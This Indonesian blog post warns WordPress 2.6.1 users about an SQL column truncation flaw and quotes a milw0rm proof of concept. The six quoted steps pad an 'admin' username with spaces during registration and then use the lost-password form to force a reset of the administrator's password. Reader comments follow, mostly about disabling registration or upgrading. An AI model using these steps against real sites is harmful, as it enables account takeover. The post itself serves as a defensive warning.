Beware Of WP Registration 2.6.1
Author: heddy8 Sep
Baru kemaren mendapatkan informasi tentang bugs Google Chrome. Hari ini mas Tono memberikan Informasi lagi mengenai WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC), yang dia dapatkan dari rss Milw0rm, memang agak telat informasi ini setidaknya baru sehari yang lalu informasi ini di publikasikan di Milw0rm.
Isi dari informasi tersebut adalah adanya celah yang bisa mengganti password admin. Jika Form Registrasi pada Wordpress Enable atau diaktifkan. Berikut ini adalah cara yang didapatkan oleh “mereka” untuk mengganti password admin :
1. go to url: server.com/wp-login.php?action=register 2. register as: login: admin[55 space chars]x email: your email now, we have duplicated 'admin' account in database 3. go to url: server.com/wp-login.php?action=lostpassword 4. write your email into field and submit this form 5. check your email and go to reset confirmation link 6. admin's password changed, but new password will be send to correct admin email # milw0rm.com [2008-09-07]
Blog yang pertama kali membuat artikel tentang ini bisa anda lihat disini.
17 Responses for "Beware Of WP Registration 2.6.1"
mantap tipsnya nih
danus last blog post..Alexa Rank Update
wew…. ngeri juga yak …..
akhirnya saya disable aja dech form registrasinya …
tp klo updaet yg baru, bete juga
afwan auliyars last blog post..Review Tulisan berkarakter ……
untung situs2 gw gak ada yng dibuka form registrasinya… padahal ada 2 biji yang make wordpress 2.6.1 hehehe
ichanxs last blog post..Rokok Diambang Kepunahan
bisa2 aja ya!
wekekekkeekke!
trendys last blog post..Telepon Umum!
wah… harus buru2 non aktifkan form register nih…
rubens last blog post..Metallica’s New Album Release on September
hmm…wp 2.6.1 yah? btw kok kayaknya emang banyak bugsnya yah?
hrxones last blog post..Adsense Method
Aku belum apgred ke WP 2.6.1. Masih 2.6 aja. Jadi nggak berani mo apgred neh. Thanks infonya ya bro…
Adieskas last blog post..Untung Ada Google Reader
pake WPMU 2.6.1 nih, sama ga ya?
makanya saya ga mau pake google chrome soalnya masih beta version, ntar kl dah ga beta mungkin mau pake…
Pertama: Saya pake blogger sie, jadi tenang…hehehe
Kedua: just info broth, dapet award dari OrangNdut
@ danu :thanks bro if this usefull..
@ afwan auliyar : iya mas mending disable saja registrationya..
@ ichanx : wah banyak juga sitenya mas ichanx inih…
@ trendy : ihihihih
@ ruben : iya brurrr…
@ hrxone : iya nih…
@ adieska : sama-sama bro..
@ hanif : wah itu saya gak tau bro..
@ bozz : iya namanya aja masih beta mas..
@ orangndut : hahahhahaha…ok thanks mas awardnya..
Wah, repot kalau begitu.
Padahal security itu penting.
Edi Psws last blog post..Blog Ini Meraih 2 Award
bahaya juga ya bug tersebut, bisa buat hack jigana mah
Klo pake blogspot…ribet gitu juga…?
manggiss last blog post..PRAHARA DI AWAL RHAMADAN….
saya dah update 2.6.2 makin banyak bug nya
zezes last blog post..O2 MusicPlayer S60v2
[...] lewat browser.. yah pokoknya banyak banget dah cemacem caranya, sampai 10 hari lebih gak apdet ini blog ku.. hikz..hikz..hikz.. Sukurlah Sudah berakhir sudah intip-FS ini, jadi saya bisa fokus lagi kejalan [...]
@ edi psw : iya mas..bener..security is first
@ kapanpun.com : iya mas..urang bener…
@ manggis : kalau pake blogspot gak tau saya mas..sepertinya nggak deh..wong yang punya si embah google
@ zeze : iya mas semakin banyak bugnya…
Leave a reply